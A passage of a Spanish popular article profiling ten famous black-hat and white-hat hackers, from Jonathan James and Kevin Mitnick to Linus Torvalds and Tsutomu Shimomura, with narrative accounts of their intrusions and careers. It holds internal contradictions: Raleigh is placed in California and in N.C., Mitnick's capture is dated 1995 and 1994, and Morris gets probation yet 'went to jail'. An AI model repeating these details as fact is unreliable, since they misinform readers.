La única reputación que te ganarás con esas costumbres es la de tonto. Los hackers tienen una gran memoria —puede costar años hasta que te acepten de nuevo después de estas cosas.
El problema con los apodos virtuales merece alguna explicación. Ocultar tu identidad detrás de un apodo es un comportamiento infantil y tonto que es característico de los crackers, warez d00dz, y otras formas inferiores de vida. Los hackers no hacen eso; ellos están orgullosos de lo que que hacen y lo quieren asociado con sus nombres reales . Así que si tienes un nombre de estos, abandónalo. En la cultura hacker solo servirán para marcarte como un perdedor.

Hackers famosos: Nuestro Ranking top 10

 

El concepto actual de hacker en los medios se ha extendido del súper espía de alta tecnología, que logra infiltrarse en los sistemas de seguridad capaz de ingresar a sistemas muy controlados como los de la Cía. y el Pentágono, al adolescente antisocial que solo busca entretenimiento.
La realidad, sin embargo, es que los hackers constituyen un grupo muy diverso, un grupo culpado simultáneamente de causar billones de dólares y al mismo tiempo se le atribuye el desarrollo de la World Wide Web (WWW) y de fundar las compañías más importantes de tecnología.
En este artículo, probaremos la teoría que la verdad es mejor que la ficción presentando a diez de los hackers más famosos, infames y heroicos, para que decidas por ti mismo.

TOP 5 DE BLACK HAT HACKERS FAMOSOS

La internet esta inundada de hackers conocidos como “crackers” o “black hats” (sombreros negro), que trabajan para explotar sistemas informáticos. Ellos son los que has visto en las noticias que son alejados de una computadora para evitar que incursionen nuevamente en ciber-crímenes. Algunos de ellos lo hacen por diversión y curiosidad, otros para beneficio económico personal. En esta sección perfilamos cinco de los hackers más famosos y más interesantes de “sombrero negro”.
1.- Jonathan James
James ganó notoriedad cuando se convirtió en el primer adolescente que era enviado a prisión acusado de Hacking. El fue sentenciado a seis meses cuando tenía solo 16 años de edad. En una entrevista anónima de la PBS, afirma: “Yo solo anduve por allí viendo, jugando. Era como un desafío para mi el ver cuanto podía lograr”, asegura el top 1 de nuestro ranking de hackers famosos black hat.
Las más importantes intrusiones de James tuvieron como objetivo organizaciones de alto grado. Él instaló un backdoor en un servidor de la Agencia de Reducción de Amenazas de la Defensa (Defense Threat Reduction Agency – DRTA). La DRTA es una agencia del Departamento de Defensa encargado de reducir las amenazas a los Estados Unidos y sus aliados de armas nucleares, biológicas, químicas, convencionales y especiales. El backdoor que el creó le permitió ver emails de asuntos delicados y capturar los nombres de usuario (username) y clave (passwords) de los empleados.
Hackers famosos: Jonathan JamesJames también crackeó las computadoras de la NASA robando software por un valor aproximado de $ 1.7 millones. Segun el Departamento de Justicia, “entre el software robado se encontraba un programa utilizado para controlar el medio ambiente -temperatura y humedad- de la Estación Espacial Internacional”. La NASA se vio forzada a tener que paralizar 21 días sus computadoras y ocasionó pérdidas calculadas en $ 41 mil. James explicó que el se bajó los codigos para suplir sus estudios de programación en C, pero afirmaba “el codigo por si solo era desastrozo … ciertamente no digno de $1.7 millones como demandaron”.
Dado el grado de sus intrusiones, si James (también conocido como “c0mrade”) hubiera sido un adulto, se le hubiera aplicado una pena mínima de no menor a diez años. En su lugar, le fue prohibido el uso recreacional de la computadora y 6 meses de arresto domiciliario. Hoy, James afirma que aprendió su lección y puede ser que comience una compañía de seguridad de computadoras.
2.- Adrian Lamo
Hackers famosos: Adrian LamoLamo saltó a la fama por sus intrusiones a organizaciones mayores como The New York Times and Microsoft. Bajo el apodo de “homeless hacker” (hacker sin hogar), el usó conexiones como Kinko (internet cafés), tiendas café y librerías para hacer sus intrusiones. En un articulo de su perfil, Lamo reflexiona “Tengo una computadora portátil en Pittsburg, me cambio de ropas en Washington D.C., para dar una idea de mi juridiscionabilidad”. Durante su niñez y años de formación su familia se mudó con frecuencia a Arlington, Virginia, Bogotá, Colombia, lugar de nacimiento de su padre y finalmente a San Francisco. Cuando decidieron trasladarse a Sacramento, Adrian Lamo que contaba con 17 años eligió quedarse en la ciudad y vivir por su cuenta. Ha pasado la mayoría de sus noches en los sofás de los amigos. Pero cuando la hospitalidad se torna difícil, se cobija en los edificios en construcción de la ciudad.
Las intrusiones de Lamo mayormente consisten en “pruebas de penetración”, en las que encuentra defectos de seguridad, los explota y luego envia un informe a las compañías de sus vulnerabilidades. Sus logros incluyen Yahoo!, Bank of America, Citigroup y Cingular. Cuando los “white hat hackers” son contratados por las compañías para hacer “pruebas de penetración” (penetration test) es legal.
Cuando Lamo rompió el sistema de seguridad de la Intranet de “The New York Times” las cosas se pusieron serias, Lamo se añadió a la lista de expertos que veía información personal de los contribuidores, incluyendo los Numeros de Seguro Social. Lamo tambien hackeó las cuentas LexisNexis de The Times para la investigación de temas de interés.
Por su intrusión al New York Times, Lamo fue obligado a pagar $65 mil de reparación. Tambien fue sentenciado a 6 meses de arresto domiciliario y dos años de libertad condicional, que expiraron el 16 de enero del 2007. Lamo está actualmente trabajando como un periodista galardonado y locutor público.
3.- Kevin Mitnick
Hackers famosos: Kevin MitnickEl auto proclamado “Hacker poster boy” (conocido como “El Condor”), Mitnick fue intensamente buscado por las autoridades. Su travesura fue promocionada por los medios de comunicación pero sus ofensas reales pueden ser menos notables de lo que su notoriedad sugiere. El Ministerio de Justicia lo describe como “el criminal de pc más querido en la historia de los Estados Unidos.” Sus proezas fueron detalladas en dos películas: Freedom Downtime y Takedown.
Mitnick a pesar de recibir calificativos siempre negativos como cracker, pirata informatico, criminal de la red, etc, en realidad es un Phreaker, es mas, considerado por muchos como “el mejor phreaker de la historia”.
Mitnick ya tenia algo de experiencia en Hacking antes de cometer los delitos que lo hicieron famoso. Él exmpezó explotando el sistema de tarjeta perforada de los buses de Los Angeles para conseguir paseos libres (gratis). Entonces, tal como el co-fundador de Apple Steve Wozniak, se metió en el phreaking telefónico. Aunque hubieron numerosos delitos, Mitnick fue condenado en última instancia por hackear la red del ordenador de Digital Equipment y robar el software.
En 1994 con el auge de la telefonía móvil, Mitnick encontró esta plataforma ideal para no ser localizado y poder deambular de un sitio a otro. Pero para ello necesitaba utilizar una serie de programas que le permitieran moverse con la misma facilidad con que lo había hecho antes (a través de la red telefónica). Así, a través de sus refinadas y exitosas técnicas de ingeniería social, logra hacerse con la clave del ordenador personal de Tsutomu Shimomura gracias a la técnica del IP Spoofing (falseamiento de ip), que para estrepitosa suerte de Mitnick, era un especialista japonés en seguridad informática, perteneciente a la Netcom On-Line Communications. Su encontronazo con Shimomura le llevaría al declive.
Shimomura era considerado un hacker de sombrero blanco (Whitehats), un hacker de los buenos, que cuando descubría alguna vulnerabilidad lo ponía en conocimiento de la policía o la entidad competente en vez de difundirlo a otros hackers por la Red. Cuando se dio cuenta de que habían vulnerado la seguridad de su propio ordenador, comenzó a investigar sobre él, y dado el carácter poco modesto de Mitnick, Shimomura se lanzó en cruzada personal contra el que ya llamaban “superhacker”, y dijo que “atraparía a ese americano estúpido”, que no pararía hasta atraparlo. Y así fue.
Hackers famosos: Mitnick hackerEn 1995 , después de haber descubierto el software de Shimomura en una cuenta de The Well (que utilizó para lanzar ataques a empresas tan conocidas como Apple, Motorola o Qualcomm), un ISP de California, tardaron alrededor de dos semanas en determinar que las llamadas provenían de Raleigh (California). Después de pasar también por el ISP Internex, Shimomura se puso en contacto con el FBI y estos enviaron un grupo de rastreo equipado con un simulador de celda (un equipo utilizado habitualmente para testear móviles) que se ocupaba de registrar el teléfono de Mitnick tanto si estaba encendido como si no. Un buen radar para localizar al hacker. Al filo de la medianoche comenzó la búsqueda de procedencia de la señal. Unas horas más tarde localizaron la señal en un grupo de apartamentos, pero aún desconocían en cuál de ellos podría encontrarse Mitnick.
Por su parte, Shimomura y el FBI planeaban la captura del hacker para el día siguiente (16 de febrero), pero un error en el mensaje codificado que Shimomura remitió al encargado de Netcom precipitó su captura, ya que este tenía orden de hacer backup de todo el material que tuviera Mitnick y posteriormente proceder a su borrado una vez fuera capturado. Y eso interpretó. El FBI se vio abocado a realizar una actuación rápida si no querían volver a perderlo, así que como no sospechaban que Mitnick pudiera ir armado, anunciaron tocaron la puerta del apartamento en el que se encontraba Mitnick. Este abrió tranquilamente la puerta, y fue arrestado de inmediato. El hacker había sido capturado. Era el 15 de febrero de 1995.
Pero a Shimomura todavía le esperaba una sorpresa más ese día. Al volver a casa y repasar los mensajes que había recibido en su contestador automático, boquiabierto escuchó varios mensajes dejados por Mitnick; mensajes que había recibido varias horas después de la captura de Mitnick. La realización de estas llamadas aún sigue siendo un misterio que forma parte de la interesante historia de este hacker.
hackerKevin Mitnick fue acusado de robo de software, fraude electrónico, daño a los ordenadores de la Universidad del Sur de California, robo de archivos e intercepción de mensajes de correo electrónico. Entre las compañías afectadas figuraban Nokia, Fujitsu, Nec, Novell, Sun Microsystems, Motorola, Apple… Se declaró no culpable y la sentencia le condenó a 5 años de cárcel sin posibilidad de fianza, lo cual condujo a los miles de hackers que seguían apasionados con la historia del Cóndor y que comenzaron la conocida campaña “Free Kevin!” (liberen a Kevin) alterando páginas web muy conocidas: Unicef, New York times, Fox TV y un largo etcétera.
Mitnick fue liberado en enero del 2000 tras permanecer casi cinco años en una prisión federal de los cuales 8 meses estuvo en confinamiento aislado, estuvo bajo libertad condicional hasta enero de 2003, despues de esto se le prohibió acceder a cualquier tipo de ordenador, teléfono móvil, televisión, o cualquier aparato electrónico que pudiera conectarse a internet, con lo cual su abstinencia informática le acompañó también durante estos tres años posteriores a su salida de la cárcel. En la actualidad, Mitnick ademas de ser consultor de seguridad, se dedica a dar conferencias sobre protección de redes informáticas, ingeniería social, etc, a lo largo y ancho del mundo, a seguir escribiendo libros, y… recaudando bastantes millones de dólares con ello.
4.- Kevin Poulsen
Tambien conocido como “Dark Dante”, Pulsen ganó reconocimiento cuando hackeó las lineas telefonicas de la radio de Los Angeles “KISS FM”, con lo cual obtuvo ganancias para comprarse un Porsche, entre otras cosas. Las fuerzas del orden lo apodaron “El Hanniba Lecter del crimen informatico”.
Las autoridades comenzaron a perseguir a Poulsen despues que hackeara una base de datos de investigación federal. Durante su persecución colmó la paciencia de los agentes del FBI al hackear los ordenadores federales que intervenian suministrandoles información.
Su especialidad de hackeo, sin embargo, giraba en torno al hacking telefónico. El hackeo mas famoso de Pulsen (“KIIS FM”) fue logrado apoderándose de las lineas telefonicas de toda la estación. Otra hazaña relacionada con Poulsen fue cuando reactivó los números viejos de “Yellow Pages” (Páginas Amarillas). Despues de que su foto saliera en el programa de “Misterios sin Resolver”, las lineas 01-800 del programa quedaron inhabilitadas. Finalmente fue capturado en un supermercado y cumplió 5 años de condena.
Desde que fue liberado Poulsen ha trabajado como periodista, ahora es un redactor reconocido de “Wired News”. Su artículo más prominente detalla su trabajo en la identificación de 744 delincuentes sexuales con perfiles MySpace.
5.- Robert Tappan Morris
Tappan Morris es hijo de un científico de la Agencia Nacional de Seguridad, y conocido como el creador del Gusano Morris, el primer gusano desencadenado en Internet. Morris escribió el código del gusano cuando era estudiante de Cornell University. Su intención era usarlo para ver que tan largo era Internet, pero el gusano se replicaba excesivamente, haciendo las computadoras demasiado lentas. La noticia se fue amplificando gracias a los intereses informativos. Se habló de cientos de millones de dólares de pérdidas y de un 10% de Internet colapsado, Morris fue juzgado en enero de 1990 y el día 22 de ese mes fue declarado culpable según la Ley de Fraude y Delitos Informáticos de 1986, aunque afortunadamente el juez atenuó las penas por no encontrar “fraude y engaño” en la actuación del joven programador. Tras el fracaso de la apelación fue confirmada su condena a 3 años en libertad condicional, una multa de 10.000 dólares y 400 horas de trabajo de servicio a la comunidad.
No es posible saber exactamente cuantas computadoras fueron afectadas, sin embargo, los expertos estiman que tuvo un impacto de 6 mil computadoras, también fue a la carcel.
Actualmente trabaja como profesor de ciencias de la computación en el MIT y en el laboratorio de Inteligencia Artificial. Él investiga principalmente arquitecturas de red de las pc’s incluyendo tablas de Hash (mapas de Hash) distribuidas tales como Chord y redes inalámbricas tales como Roofnet.

TOP 5 DE WHITE HAT HACKERS FAMOSOS

Los hackers que usan sus habilidades para el bien son clasificados como “White Hat”. Estos “White Hat” trabajan a menudo bajo la clasiciacion de “Hackers Eticos Certificados” y son contratados por las compañías para probar la seguridad de sus sistemas. Otros vulneran la seguridad de los sistemas sin el permiso de la compañía pero sin romper las leyes, y en el proceso han creado ideas innovativas realmente interesantes. En esta sección se perfilarán cinco hackers de sombrero blanco (White Hat Hackers) y las tecnologías que han desarrollado.
1.- Stephen Wozniak
“Woz” es el co-fundador de Apple, él y Steve Jobs fueron los creadores de Apple. Wozniak fundó Apple Computer junto con Steve Jobs en 1976 y creó los ordenadores Apple I y Apple II a mediados de los años setenta. Fue premiado con la Medalla Nacional de Tecnologia así como doctorados honorarios de la Kettering Universitiy y de la Nova Southeastern University, además fué nombrado para el Salón de la Fama de los Inventores del País, en Septiembre del año 2000.
Woz empezó a hackear haciendo cajas azules (blue boxes) las cuales lograban imitar los sonidos del teléfono de ésa época logrando así llamadas gratuitas de larga distancia. Después de leer un artículo de “phone preaking”, llamó a su amigo Steve Jobs, y los dos investigaron sobre frequencias, luego construyeron y vendieron “blue boxes” a sus compañeros de clase.
En 1975, Woz abandonó la Universidad de California, Berkeley (aunque él acabaría su carrera en Ingeniería Informática en 1986) y se dedicó a la computadora que lo hizo famoso, Jobs tuvo la idea de vender la computadora como un tablero completo. Los dos amigos vendieron un prototipo de una calculadora científica para tener capital, y trabajaron en hacer prototipos en el garage de Steve Jobs. Wozniak diseñó el hardware y casi todo el software. Y vendieron las primeras 100 Apple I a un comprador local por $ 666.66 dólares cada una.
Woz ahora convertido en filantropo se dedica a apoyar a las escuelas o comunidades educativas con escasos recursos proveyéndoles de tecnología de ultima generación.
2.- Tim Berners-Lee
Sir Timothy “Tim” John Berners-Lee, KBE (TimBL o TBL) es el creador de la Word Wide Web (WWW). Nacido el 8 de junio de 1955 en Londres Inglaterra, se licenció en Física en 1976 en el Queen’s College de la Universidad de Oxford. Sus padres eran matemáticos. Trabajando como investigador en el Laboratorio Europeo de Física de Partículas (CERN) de Ginebra, concibió la idea de un proyecto de hipertexto global, que años más tarde se convertiría en la WWW.
Mientras fué estudiante en la universidad de Oxford, hackeaba con precaución junto con un amigo, y luego fué betado de las computadoras de la Universidad, él armó su primra computadora con hierro soldado, puentes TTL, un procesador M6800 y una televisión vieja. En 1980 en la CERN de Junio a septiembre Berners-Lee propuso un proyecto que facilitaba compartir y poner al día la información entre investigadores, con ayuda de Robert Cailliau construyó un sistema llamado ENQUIRE.
Después de dejar el CERN en 1980 para trabajar en la empresa de John Poole llamada Image Computer Systems volvió con su compañero en 1984.
En marzo de 1989 propuso al CERN un proyecto de gestión de la información que tuvo escaso eco. Un primer programa fue presentado en el CERN a finales de 1990. Del 1991 al 1993 contribuyó al diseño de la Web: las especificaciones iniciales de “HTTP” y de “HTML”,un “hipertexto” que permite la publicación de documentos. Y, en 1992, empezaron las primeras presentaciones públicas. Como el programa era puesto libremente a disposición desde el CERN, en el corazón de Internet europeo, su difusión fue muy rápida; el número de servidores Web pasó de veintiséis de 1992 a doscientos en octubre de 1995.
En 1994 entró en el laboratorio de Computer Science (LCS) de Massachusetts Institute of Technology (MIT). Se trasladó a EE.UU. y puso en marcha el W3C, que dirige actualmente, un organismo dependiente del Instituto de Tecnología de Massachusetts que actúa no sólo como puerto.
El año 2002 fue premiado con el Premio Príncipe de Asturias de Investigación Científica y Técnica. Mientras que en el año 2004 gana el primer Premio de Tecnología del Milenio.
En su libro Tejiendo la red, publicado el 1999, Tim Berners-Lee explica por qué la tecnología web es libre y gratis.
3.- Linus Torvalds
Linus Torvalds (sus padres tomaron su nombre de Linus Pauling) es el padre de Linux. Se llama a si mismo “un ingeniero”, y dice que aspira a algo simple, “I just want to have fun making the best damn operating system I can” (solo quiero divertirme haciendo el mejor endemoniado sistema que pueda).
Tuvo su comienzo en las computadoras con una Commodore VIC-20, una computadora casera de 8 bits. Después se mudó a Sinclaris QL, específicamente los hackeos de Torvalds incluyen “un ensamblador y un editor de texto asi como algunos juegos”
Creó el kernel/GNU de Linux en 1991, usando un sistema operativo llamado Minix como inspiración. Empezó con un “task switcher” en una Intel 80386 ensablada y un periférico terminal, después de eso, puso el código a disposición de otros para que contribuyeran en lo que quisieran.
Linus Torvalds es la cabeza de Linux, cordinando el código que programadores voluntarios hacen para el kernel, y ha recibido varios premios como en 1997 de Nokia Foundation Award de Nokia y Lifetime Achievement Award at Uniforum Pictures. Ese mismo año finaliza los estudios superiores (1988 – 1997) tras una década como estudiante e investigador en la Universidad de Helsinki, coordinando el desarrollo del núcleo del S.O. desde 1992.
Torvalds trabajó en Transmeta de febrero de 1997 a Junio de 2003 pero actualmente trabaja para el Open Source Development Labs en Beaverton, Oregon. Solo el 2% del código del Linux actual está escrito por él, pero en su persona sigue descansando la paternidad de este núcleo del sistema operativo.
Torvalds posee la marca registrada “Linux” y supervisa el uso o en su defecto el abuso de la marca a través de la organización sin ánimo de lucro Linux International.
En una entrevista a mediados del año 2005, Linus comentó “Aunque soy el padre de Linux, mis hijos usan Windows”.
4.- Richard Stallman
La fama de Stallman viene de la fundación del código abierto, es conocido como el padre del Software libre, en su biografía dice: “Non-free software keeps users divided and helpless, forbidden to share it and unable to change it. A free operating system is essential for people to be able to use computers in freedom.” (el software no libre mantiene a usuarios divididos y desamparados, prohibido para compartirlo e incapaz cambiarlo. Un sistema operativo libre es esencial para que la gente pueda utilizar las computadoras en la libertad )
Stallman, quien prefiere ser llamado rms (por las iniciales de su nombre), tiene su comienzo en hackeo en el MIT. Él trabajó como un “staff hacker” en el proyecto de Emacs, y en otros. El criticaba el acceso restringido a las computadoras en el laboratorio. Cuando un sistema de passwords era instalado, Stallman lo rompía, y reseteaba los passwords como cadenas nulas, o “null strings”, luego enviava a los usuarios mensajes informándoles que ya no había sistema de passwords.
El comienzo de Stallman, en el software libre empezó con una impresora, en el laboratorio del MIT, el y otros hackers podían modificar el código de las impresoras, mandando mensajes de alerta cuando era conveniente, sin embargo, una nueva impresora llegó, una a la cual ellos no tenían permitido modificar el código, fué cuando Stallman se conveció de que “the ethical need to require free software.”
Con ésta inspiración empezó a trabajar en GNU. Stallman escribió un ensayo llamado “The GNU Project”, en el cual él recuerda haber escogido un sistema operativo para trabajar, por su fundación “the crucial software to use a computer”. En este tiempo la versión del sistema operativo GNU/Linux usaba el kernel de Linux iniciado por Torvalds. GNU es distribuido mediante “copyleft”, un método que usa los derechos de autor y permite a los usuarios, usar, modificar, copiar y distribuir el software.
La vida de Stallman continua para promover el software libre. El trabaja en contra de movimientos como Digital Rights Management o como el lo llama Digital Restrictions Management, a través de organizaciones como Free Software Foundation y League for Programming Freedom. Él ha recibido varios reconocimientos por su trabajo, incluyendo premios y cuatro doctorados.
“La única manera de ser libre es rechazar los programas propietarios”
5.- Tsutomu Shimomura
Tsutomu Shimomura fue un físico experto en seguridad conocido por colaborar con John Markoff y ayudar al FBI a arrestar a Kevin Mitnick. Shimomura buscó, encontró y desenmascaro a Kevin Mitnick, el cracker/phreaker más famoso de USA, a principios de 1994. Después de que sus colegas del “San Diego Supercomputing Center” le informaron a Shimomura que alguien había robado centenares de programas y los ficheros de su estación de trabajo, el experto en seguridad computacional Tsutomu trabajó en extremo para seguir al ladrón a través del “WELL”. Un rastro del “telco labyrinthine” lo condujo eventualmente a un complejo en Raleigh, N.C donde más tarde los agentes de FBI arrestarían a Mitnick en su departamento. Pero eso no fue todo, Shimomura fue el consultor del FBI, la fuerza aérea y de la agencia de la seguridad nacional (NSA).
Sin embargo Tsutomu Shimomura fue antes un hacker del mundo oscuro, pues invadió el sistema de la AT&T y asi fue como pudo rastrear las llamadas y escucharlas, para luego dárselas al FBI. Se podría pensar que colaboró invadiendo en este caso excepcional, pero el ya tenia el sistema de invasión armado antes que se solicite el apoyo del servicio de defensa de USA. Es decir, este white hat hacker se unió al grupo de hackers famosos pero habiendo sido antes un black hat hacker.